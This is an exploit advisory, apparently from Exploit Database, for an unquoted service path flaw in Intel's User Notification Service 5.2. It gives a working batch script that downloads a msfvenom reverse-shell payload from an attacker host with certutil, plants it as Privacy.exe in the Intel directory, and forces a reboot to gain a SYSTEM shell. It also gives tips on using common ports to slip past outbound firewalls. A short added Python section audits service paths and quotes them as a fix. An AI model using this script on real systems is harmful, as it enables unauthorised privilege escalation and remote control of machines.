UNSAFE-INLINE
Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path Privilege Escalation
The path of the Intel(r) Management and Security Application User Notification Service (v5.2) contains spaces and is not surrounded by quotation marks, so Windows has to guess where to find the UNS executable, which starts automatically. Windows first treats the first space as the end of the file name and interprets everything that follows as arguments passed to that executable.
# User Notification Service path:
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
0x01 Option:
File Path: C:\Program
Arguments: Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
If there is no Program.exe in the "C:\" directory, Windows attempts the second option.
0x02 Option:
File Path: C:\Program Files
Arguments: (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
If there is no Program Files.exe in the "C:\" directory, Windows attempts the third option.
0x03 Option:
File Path: C:\Program Files (x86)\Common
Arguments: Files\Intel\Privacy Icon\UNS\UNS.exe
If there is no Common.exe in the "C:\Program Files (x86)\" directory, Windows attempts the fourth option.
0x04 Option:
File Path: C:\Program Files (x86)\Common Files\Intel\Privacy
Arguments: Icon\UNS\UNS.exe
If there is no Privacy.exe in the "C:\Program Files (x86)\Common Files\Intel\" directory, Windows attempts the fifth option.
0x05 Option:
File Path: C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
Arguments: <blank>
If a user has permission to write to one of these directories, the user's mandatory level will be elevated to SYSTEM when the Windows 7 / 8 machine reboots.
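The lookup order walked through above can be turned into an audit check. The following is an added example, not part of the original write-up: for each service ImagePath it lists the earlier file names Windows would try, the directories whose write permissions need review, and the quoted value that removes the ambiguity. The two sample rows other than UNS, the function names, and the assumption that the binary ends in `.exe` are constructed for illustration.

```python
import ntpath

# Constructed sample rows: (service name, ImagePath value). Only the UNS path
# comes from the write-up; the other two are made up for contrast.
SAMPLE_SERVICES = [
    ("UNS", r"C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -k run'),
    ("NoSpaceSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

def split_image_path(image_path):
    """Return (executable, is_quoted). Assumption: an unquoted binary ends at
    the first '.exe', so anything after that is treated as arguments."""
    value = image_path.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end if end != -1 else None], True
    idx = value.lower().find(".exe")
    return (value[:idx + 4] if idx != -1 else value), False

def candidate_paths(image_path):
    """Files Windows would try before the real binary: every prefix of an
    unquoted path that ends at a space, with '.exe' appended."""
    exe, quoted = split_image_path(image_path)
    if quoted:
        return []
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def quoted_image_path(image_path):
    """ImagePath with the executable wrapped in quotes, arguments kept."""
    value = image_path.strip()
    exe, quoted = split_image_path(value)
    return value if quoted else f'"{exe}"' + value[len(exe):]

def audit(services):
    """Map each affected service to its candidates, the directories whose
    ACLs need review, and the corrected ImagePath."""
    findings = {}
    for name, image_path in services:
        cands = candidate_paths(image_path)
        if cands:
            dirs = list(dict.fromkeys(ntpath.dirname(c) for c in cands))
            findings[name] = {"candidates": cands, "dirs_to_check": dirs,
                              "fixed": quoted_image_path(image_path)}
    return findings

if __name__ == "__main__":
    for svc, info in audit(SAMPLE_SERVICES).items():
        print(svc, info)
```

On a live host the values to feed in are the `ImagePath` entries under `HKLM\SYSTEM\CurrentControlSet\Services\<name>`.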
I have discovered this vulnerability on Intel User Notification Service 5.2; maybe other versions lower than 5.2 are affected as well. Privacy.exe was created with msfvenom and served on port 80. Also, port 443 was used for the reverse shell; if there is a firewall in front of the target machine, outbound firewall rules usually allow ports 80, 443 and 53.
Using the following commands, I elevated the mandatory level from high to SYSTEM without any special misconfiguration on the directory.
exploit.bat:
@ECHO OFF
ECHO =======================================================================================================================
ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
ECHO =======================================================================================================================
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc UNS
ECHO [+] Your mandatory level is:
whoami /groups | findstr /B /C:"Mandatory Label"
::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
ECHO [?]
ECHO [+] Enumeration was completed successfully.
ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
PAUSE
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
ECHO [+] The download was successful.
) ELSE (
ECHO [-] The download was unsuccessful.
PAUSE
)
ECHO [!] If you continue, system will reboot.
PAUSE
shutdown /r /t 0
::code end
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
Exploit Database